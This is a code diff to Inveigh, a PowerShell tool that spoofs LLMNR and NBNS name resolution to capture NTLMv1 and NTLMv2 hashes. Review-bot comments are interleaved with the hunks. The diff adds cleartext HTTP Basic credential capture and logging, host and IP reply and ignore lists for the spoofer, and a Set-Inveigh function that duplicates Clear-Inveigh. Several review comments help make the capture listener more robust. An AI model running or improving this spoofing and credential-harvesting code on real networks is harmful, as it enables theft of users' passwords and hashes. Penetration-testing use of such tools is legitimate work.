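Review bot: `[System.Convert]::FromBase64String($authentication_header)` in the new Basic branch throws on any malformed or non-Base64 `Authorization: Basic` value a client sends, and no try/catch is visible in this hunk; unless the listener loop that begins before the hunk catches it, one bad header stops the listener. In addition, `-replace 'Basic ',''` is a regex replacement applied across the whole string rather than just the prefix, and `startswith('Basic ')` is case-sensitive although the scheme token is not. Suggested: `if($authentication_header.StartsWith('Basic ', [System.StringComparison]::OrdinalIgnoreCase))`, then `try { $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header.Substring(6))) } catch { $cleartext_credentials = $null }`, and gate the log, queue and list additions on `if($cleartext_credentials)`.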
@@ -826,7 +1066,7 @@ $HTTP_scriptblock =
# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer
$sniffer_scriptblock =
{
- param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpoofList,$MachineAccounts,$ForceWPADAuth,$RunTime)
+ param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$MachineAccounts,$RunTime)
$byte_in = New-Object Byte[] 4
$byte_out = New-Object Byte[] 4
@@ -1018,7 +1258,7 @@ $sniffer_scriptblock =
{
if($NBNSTypes -contains $NBNS_query_type)
{
- if ((!$Spooflist -or $SpoofList -contains $NBNS_query_string) -and $inveigh.IP_capture_list -notcontains $source_IP)
+ if ((!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and $inveigh.IP_capture_list -notcontains $source_IP)
{
[void]$send_socket.sendTo( $NBNS_response_packet, $destination_point )
$send_socket.Close()
@@ -1026,9 +1266,21 @@ $sniffer_scriptblock =
}
else
{
- if($SpoofList -notcontains $NBNS_query_string)
+ if($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string)
{
- $NBNS_response_message = "- $NBNS_query_string not on spoof list"
+ $NBNS_response_message = "- $NBNS_query_string is not on reply list"
+ }
+ elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string)
+ {
+ $NBNS_response_message = "- $NBNS_query_string is on ignore list"
+ }
+ elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+ {
+ $NBNS_response_message = "- $source_IP is not on reply list"
+ }
+ elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
+ {
+ $NBNS_response_message = "- $source_IP is on ignore list"
}
else
{
@@ -1077,7 +1329,7 @@ $sniffer_scriptblock =
if($LLMNR -eq 'y')
{
- if((!$Spooflist -or $SpoofList -contains $LLMNR_query_string) -and $inveigh.IP_capture_list -notcontains $source_IP)
+ if((!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and $inveigh.IP_capture_list -notcontains $source_IP)
{
[void]$send_socket.sendTo( $LLMNR_response_packet, $destination_point )
$send_socket.Close( )
@@ -1085,9 +1337,21 @@ $sniffer_scriptblock =
}
else
{
- if($SpoofList -notcontains $LLMNR_query_string)
+ if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
{
- $LLMNR_response_message = "- $LLMNR_query_string not on spoof list"
+ $LLMNR_response_message = "- $LLMNR_query_string is not on reply list"
+ }
+ elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string)
+ {
+ $LLMNR_response_message = "- $LLMNR_query_string is on ignore list"
+ }
+ elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+ {
+ $LLMNR_response_message = "- $source_IP is not on reply list"
+ }
+ elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
+ {
+ $LLMNR_response_message = "- $source_IP is on ignore list"
}
else
{
@@ -1178,6 +1442,12 @@ $sniffer_scriptblock =
$inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append
$inveigh.NTLMv2_file_queue.RemoveRange(0,1)
}
+
+ while($inveigh.cleartext_file_queue.Count -gt 0)
+ {
+ $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
+ $inveigh.cleartext_file_queue.RemoveRange(0,1)
+ }
}
}
@@ -1213,11 +1483,9 @@ Function HTTPListener()
$HTTP_powershell = [powershell]::Create()
$HTTP_powershell.Runspace = $HTTP_runspace
$HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
- $HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null
- $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($MachineAccounts).AddArgument($ForceWPADAuth) > $null
+ $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($HTTPAuth).AddArgument(
+ $HTTPBasicRealm).AddArgument($MachineAccounts).AddArgument($WPADAuth) > $null
$HTTP_handle = $HTTP_powershell.BeginInvoke()
}
@@ -1233,8 +1501,9 @@ Function SnifferSpoofer()
$sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
$sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($LLMNR_response_message).AddArgument(
$NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument(
- $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpoofList).AddArgument(
- $MachineAccounts).AddArgument($ForceWPADAuth).AddArgument($RunTime) > $null
+ $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument(
+ $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
+ $MachineAccounts).AddArgument($RunTime) > $null
$sniffer_handle = $sniffer_powershell.BeginInvoke()
}
@@ -1266,6 +1535,11 @@ if($inveigh.console_output)
{
switch -wildcard ($inveigh.console_queue[0])
{
+ "*cleartext credentials written to*"
+ {
+ write-warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
"*local administrator*"
{
write-warning $inveigh.console_queue[0]
@@ -1438,6 +1712,11 @@ Function Get-Inveigh
{
switch -wildcard ($inveigh.console_queue[0])
{
+ "*cleartext credentials written to*"
+ {
+ write-warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
"*local administrator*"
{
write-warning $inveigh.console_queue[0]
@@ -1479,6 +1758,15 @@ Function Get-Inveigh
}
}
+Function Get-InveighCleartext
+{
+ <#
+ .SYNOPSIS
+ Get-InveighCleartext will get all captured cleartext credentials.
+ #>
+ $inveigh.cleartext_list
+}
+
Function Get-InveighNTLM
{
<#
@@ -1496,11 +1784,11 @@ Function Get-InveighNTLMv1
Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes.
.PARAMETER Unique
- Default = Disabled: Enable/Disable displaying only the first captured challenge/response for each unique account.
+ Display only the first captured challenge/response for each unique account.
#>
param
(
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$Unique="N",
+ [parameter(Mandatory=$false)][switch]$Unique,
[parameter(ValueFromRemainingArguments=$true)] $invalid_parameter
)
@@ -1509,7 +1797,7 @@ Function Get-InveighNTLMv1
throw "$($invalid_parameter) is not a valid parameter."
}
- if($Unique -eq 'y')
+ if($Unique)
{
$inveigh.NTLMv1_list.sort()
@@ -1538,11 +1826,11 @@ Function Get-InveighNTLMv2
Get-InveighNTLMv2 will get captured NTLMv1 challenge/response hashes.
.PARAMETER Unique
- Default = Disabled: Enable/Disable displaying only the first captured challenge/response for each unique account.
+ Display only the first captured challenge/response for each unique account.
#>
param
(
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$Unique="N",
+ [parameter(Mandatory=$false)][switch]$Unique,
[parameter(ValueFromRemainingArguments=$true)] $invalid_parameter
)
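Review bot: The synopsis context line in this hunk, `Get-InveighNTLMv2 will get captured NTLMv1 challenge/response hashes.`, still says NTLMv1 for the NTLMv2 function; while the parameter help is being rewritten here, change it to `Get-InveighNTLMv2 will get captured NTLMv2 challenge/response hashes.`.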
@@ -1551,7 +1839,7 @@ Function Get-InveighNTLMv2
throw "$($invalid_parameter) is not a valid parameter."
}
- if($Unique -eq 'y')
+ if($Unique)
{
$inveigh.NTLMv2_list.sort()
@@ -1588,6 +1876,7 @@ Function Get-InveighStats
.SYNOPSIS
Get-InveighLog will get log.
#>
+ Write-Output("Total Cleartext Captures = " + $inveigh.cleartext_list.count)
Write-Output("Total NTLMv1 Captures = " + $inveigh.NTLMv1_list.count)
Write-Output("Total NTLMv2 Captures = " + $inveigh.NTLMv2_list.count)
}
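Review bot: Get-InveighStats' synopsis in the context lines above the new cleartext counter reads `Get-InveighLog will get log.`, which describes a different function; suggest `Get-InveighStats will get the number of captured cleartext, NTLMv1, and NTLMv2 credentials.` so the help reflects the three counters the function now prints.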
@@ -1697,3 +1986,23 @@ Function Clear-Inveigh
}
}
}
+
+Function Set-Inveigh
+{
+ <#
+ .SYNOPSIS
+ Set-Inveigh allows setting or modifying some parameters while Inveigh is running.
+ #>
+ if($inveigh)
+ {
+ if(!$inveigh.running -and !$inveigh.relay_running)
+ {
+ Remove-Variable inveigh -scope global
+ Write-Output "Inveigh data has been cleared from memory"
+ }
+ else
+ {
+ Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
+ }
+ }
+}
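Review bot: Set-Inveigh's body does not match its synopsis: the synopsis says it allows setting or modifying parameters while Inveigh is running, but the code removes the global `$inveigh` variable when nothing is running and otherwise prints `Run Stop-Inveigh before running Clear-Inveigh`, i.e. it is a copy of Clear-Inveigh under a new name. As committed, calling Set-Inveigh on an idle session discards the captured NTLMv1/NTLMv2/cleartext lists stored in `$inveigh`. Either leave the function out until it has its own implementation, or keep a placeholder whose body is a single `Throw "Set-Inveigh is not implemented"` with a synopsis that says so.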